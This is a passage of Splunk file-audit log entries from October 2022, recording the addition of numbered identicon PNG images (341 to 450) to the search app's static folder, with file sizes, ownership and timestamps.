17:42:53.966, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/450.png", isdir=0, size=385, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.961, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/45.png", isdir=0, size=348, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.957, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/449.png", isdir=0, size=333, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.953, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/448.png", isdir=0, size=342, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.948, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/447.png", isdir=0, size=296, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.943, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/446.png", isdir=0, size=353, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.939, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/445.png", isdir=0, size=322, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.935, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/444.png", isdir=0, size=326, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.932, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/443.png", isdir=0, size=368, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.927, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/442.png", isdir=0, size=385, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.923, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/441.png", isdir=0, size=391, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.918, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/440.png", isdir=0, size=357, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.914, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/44.png", isdir=0, size=369, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.910, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/439.png", isdir=0, size=340, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.906, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/438.png", isdir=0, size=300, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.902, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/437.png", isdir=0, size=383, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.897, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/436.png", isdir=0, size=345, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.893, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/435.png", isdir=0, size=329, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.889, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/434.png", isdir=0, size=379, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.884, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/433.png", isdir=0, size=335, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.880, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/432.png", isdir=0, size=398, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.876, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/431.png", isdir=0, size=358, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.872, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/430.png", isdir=0, size=368, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.868, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/43.png", isdir=0, size=327, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.864, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/429.png", isdir=0, size=329, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.860, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/428.png", isdir=0, size=339, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.856, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/427.png", isdir=0, size=366, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.852, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/426.png", isdir=0, size=292, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.848, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/425.png", isdir=0, size=375, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.843, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/424.png", isdir=0, size=306, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.838, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/423.png", isdir=0, size=295, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.834, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/422.png", isdir=0, size=409, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.829, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/421.png", isdir=0, size=316, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.825, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/420.png", isdir=0, size=358, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.819, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/42.png", isdir=0, size=402, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.815, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/419.png", isdir=0, size=375, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.811, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/418.png", isdir=0, size=347, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.806, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/417.png", isdir=0, size=284, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.801, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/416.png", isdir=0, size=301, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.797, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/415.png", isdir=0, size=352, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.793, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/414.png", isdir=0, size=339, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.789, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/413.png", isdir=0, size=383, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.785, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/412.png", isdir=0, size=329, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.781, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/411.png", isdir=0, size=367, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.776, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/410.png", isdir=0, size=374, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.772, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/41.png", isdir=0, size=322, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.768, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/409.png", isdir=0, size=353, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.764, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/408.png", isdir=0, size=348, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.760, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/407.png", isdir=0, size=355, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.755, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/406.png", isdir=0, size=344, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.751, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/405.png", isdir=0, size=356, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.747, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/404.png", isdir=0, size=355, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.742, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/403.png", isdir=0, size=284, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.736, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/402.png", isdir=0, size=370, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.731, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/401.png", isdir=0, size=335, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.727, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/400.png", isdir=0, size=365, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.722, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/40.png", isdir=0, size=355, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.718, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/4.png", isdir=0, size=385, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.714, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/399.png", isdir=0, size=372, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.709, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/398.png", isdir=0, size=368, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.706, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/397.png", isdir=0, size=341, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.702, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/396.png", isdir=0, size=383, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.698, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/395.png", isdir=0, size=383, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.695, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/394.png", isdir=0, size=344, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.691, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/393.png", isdir=0, size=385, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.687, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/392.png", isdir=0, size=339, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.683, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/391.png", isdir=0, size=338, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.665, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/390.png", isdir=0, size=387, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.662, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/39.png", isdir=0, size=380, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.658, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/389.png", isdir=0, size=380, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.653, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/388.png", isdir=0, size=325, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.649, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/387.png", isdir=0, size=380, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.645, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/386.png", isdir=0, size=357, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.641, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/385.png", isdir=0, size=352, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.637, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/384.png", isdir=0, size=371, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.634, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/383.png", isdir=0, size=278, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.630, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/382.png", isdir=0, size=368, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.624, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/381.png", isdir=0, size=373, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.620, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/380.png", isdir=0, size=337, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.615, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/38.png", isdir=0, size=394, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.611, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/379.png", isdir=0, size=339, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.607, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/378.png", isdir=0, size=391, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.603, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/377.png", isdir=0, size=330, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.599, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/376.png", isdir=0, size=321, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.583, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/375.png", isdir=0, size=362, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.576, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/374.png", isdir=0, size=349, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.571, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/373.png", isdir=0, size=360, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.566, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/372.png", isdir=0, size=331, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.562, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/371.png", isdir=0, size=327, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.556, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/370.png", isdir=0, size=352, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.551, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/37.png", isdir=0, size=384, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.546, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/369.png", isdir=0, size=344, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.541, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/368.png", isdir=0, size=400, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.537, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/367.png", isdir=0, size=373, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.533, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/366.png", isdir=0, size=366, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.529, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/365.png", isdir=0, size=262, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.525, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/364.png", isdir=0, size=394, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.521, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/363.png", isdir=0, size=355, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.515, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/362.png", isdir=0, size=383, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.511, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/361.png", isdir=0, size=294, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.507, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/360.png", isdir=0, size=364, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.502, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/36.png", isdir=0, size=343, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.497, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/359.png", isdir=0, size=389, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.492, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/358.png", isdir=0, size=355, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.487, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/357.png", isdir=0, size=350, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.484, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/356.png", isdir=0, size=366, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.480, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/355.png", isdir=0, size=383, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.476, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/354.png", isdir=0, size=379, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.472, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/353.png", isdir=0, size=368, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.469, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/352.png", isdir=0, size=397, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.465, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/351.png", isdir=0, size=390, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.461, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/350.png", isdir=0, size=391, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.458, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/35.png", isdir=0, size=322, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.454, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/349.png", isdir=0, size=372, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.451, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/348.png", isdir=0, size=315, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.447, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/347.png", isdir=0, size=322, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.442, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/346.png", isdir=0, size=343, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.438, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/345.png", isdir=0, size=324, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.434, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/344.png", isdir=0, size=336, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.430, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/343.png", isdir=0, size=331, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.425, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/342.png", isdir=0, size=371, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.421, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/341.png", isdir=0, size=363, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] 